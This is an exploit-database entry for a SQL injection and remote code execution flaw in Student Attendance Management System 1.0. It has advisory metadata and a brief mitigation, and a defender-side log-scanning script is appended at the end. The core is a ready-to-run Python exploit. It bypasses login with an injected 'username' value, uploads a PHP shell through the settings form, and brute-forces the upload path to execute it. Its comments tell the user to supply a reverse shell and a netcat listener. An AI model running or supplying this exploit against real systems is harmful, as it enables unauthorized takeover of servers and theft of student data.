Vendor: Student Attendance Management System
By: mosaaed
CVSS: 9.8 (HIGH)
Category: SQL Injection / Remote Code Execution
CWE: 89
Product Name: Student Attendance Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:student_attendance_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Parrot 5.5.17 + Apache 2.4.46
Published: 2020

Student Attendance Management System 1.0 – ‘username’ SQL Injection / Remote Code Execution

An attacker can exploit a SQL injection vulnerability in the Student Attendance Management System 1.0 application to execute arbitrary code on the server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' parameter of the 'ajax.php' script. An attacker can send a specially crafted request containing malicious SQL statements to the vulnerable script, which will be executed in the context of the application. This can be exploited to manipulate SQL queries to disclose sensitive information from the database, modify data, or execute arbitrary code on the server.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.

Exploit-DB raw data:

# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time


def sqli_admin():
    # The login handler builds its query from the raw 'username' value, so the
    # injected quote closes the string, '1'='1 is always true and '#' comments
    # out the rest of the statement; the password value is irrelevant.
    s = requests.Session()
    data = {"username": "admin'or'1'=1#", "password": "mosaaed"}
    adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
    s.post(adminlogin, data=data)
    return s


def trigger_rce(session):
    # Record the upload time: the application stores the uploaded image under
    # assets/uploads/ with a Unix-timestamp prefix, which get_shell() then probes.
    starttime = int(time.time())
    multipart_form_data = {
        "name": "cyberscurity",
        "email": "test@test.com",
        "contact": "+11111111111",
        "about": "attack",
        # save_settings accepts any file as the profile image, including PHP
        "img": ("shell.php", open("shell.php", "rb")),
    }
    session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
    get_shell(starttime - 100, starttime + 100, session)


def get_shell(start, end, session):
    # Probe the +/-100 second window around the upload; a 200 means the file
    # exists under that name (and the request has already executed it).
    for i in range(start, end):
        url = "http://localhost/sta/assets/uploads/" + str(i) + "_shell.php"
        response = session.get(url)
        if response.status_code == 200:
            print(url)


def main():
    session = sqli_admin()
    trigger_rce(session)


if __name__ == '__main__':
    main()
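As an added defender-side example (not part of the Exploit-DB entry or the author's script): a scan of Apache access-log lines for the signature the get_shell() loop leaves behind, a burst of GETs from one client to timestamp-prefixed PHP files under assets/uploads/, preceded by POSTs to the save_settings action. The log lines are constructed, and the paths assume the application is installed under /sta/ as in the script.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log lines (not from the page) mimicking the script:
# login POST, upload POST, then sequential probes of <epoch>_shell.php.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Nov/2020:10:00:00 +0000] "POST /sta/ajax.php?action=save_settings HTTP/1.1" 200 12 "-" "python-requests/2.24.0"
10.0.0.5 - - [04/Nov/2020:10:00:01 +0000] "POST /sta/ajax.php?action=save_settings HTTP/1.1" 200 12 "-" "python-requests/2.24.0"
10.0.0.5 - - [04/Nov/2020:10:00:01 +0000] "GET /sta/assets/uploads/1604484000_shell.php HTTP/1.1" 404 196 "-" "python-requests/2.24.0"
10.0.0.5 - - [04/Nov/2020:10:00:01 +0000] "GET /sta/assets/uploads/1604484001_shell.php HTTP/1.1" 200 0 "-" "python-requests/2.24.0"
10.0.0.5 - - [04/Nov/2020:10:00:02 +0000] "GET /sta/assets/uploads/1604484002_shell.php HTTP/1.1" 404 196 "-" "python-requests/2.24.0"
10.0.0.9 - - [04/Nov/2020:10:05:00 +0000] "GET /sta/assets/uploads/1604480000_avatar.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
# get_shell() walks <unix-time>_<name>.php for +/-100 seconds around the upload,
# so a run of such GETs from one client is the signature to look for.
PROBE_RE = re.compile(r'/assets/uploads/\d{9,10}_[^/]+\.php$')
UPLOAD_RE = re.compile(r'/ajax\.php\?action=save_settings')


def detect_upload_probing(log_text, min_probes=3):
    """Return {ip: {"probes": n, "uploads": n, "executed": [paths]}} for clients
    that probed timestamp-prefixed PHP files under assets/uploads/ at least
    min_probes times. 'executed' lists probes answered with 200, i.e. files the
    server actually found and ran; those paths are the ones to pull and delete."""
    per_ip = defaultdict(lambda: {"probes": 0, "uploads": 0, "executed": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        rec = per_ip[m["ip"]]
        method, path, status = m["method"], m["path"], int(m["status"])
        if method == "POST" and UPLOAD_RE.search(path):
            rec["uploads"] += 1
        elif method == "GET" and PROBE_RE.search(path):
            rec["probes"] += 1
            if status == 200:
                rec["executed"].append(path)
    return {ip: r for ip, r in per_ip.items() if r["probes"] >= min_probes}


if __name__ == "__main__":
    for ip, rec in detect_upload_probing(SAMPLE_LOG).items():
        print(ip, rec)
```

The real script issues about 200 probes, so a production threshold can be far higher than the 3 used here for the sample; the 404 storm alone is a strong signal even when no probe returns 200.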